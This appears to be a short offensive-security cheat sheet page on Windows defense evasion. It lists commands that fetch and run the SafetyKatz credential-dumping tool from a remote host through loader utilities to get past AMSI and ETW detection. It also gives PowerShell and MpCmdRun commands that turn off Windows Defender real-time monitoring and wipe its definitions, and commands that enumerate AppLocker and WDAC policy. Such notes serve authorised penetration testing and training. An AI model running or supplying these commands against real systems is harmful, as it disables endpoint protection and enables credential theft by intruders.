notes

Tools

Bypass AMSI

Bypass AMSI and ETW based detection by loading the binary using loader utility

C:\Users\Public\Loader.exe -path http://10.10.10.10/SafetyKatz.exe
C:\Users\Public\AssemblyLoad.exe http://10.10.10.10/Loader.exe -path http://10.10.10.10/SafetyKatz.exe

Bypass Real-Time-monitoring

Powershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $true
powershell set-MpPreference -DisableAutoExclusions $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Bypassing Applocker & WDAC Bypas

Check if Powershell is running in Constrained Language Mode (It may be because of Applocker or WDAC)

$ExecutionContext.SessionState.LanguageMode

Check applocker policy for Application Whitelisting via Powerview and Registry (reg.exe)

Get-AppLockerPolicy –Effective
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

Previousmethodology

Last updated 1 month ago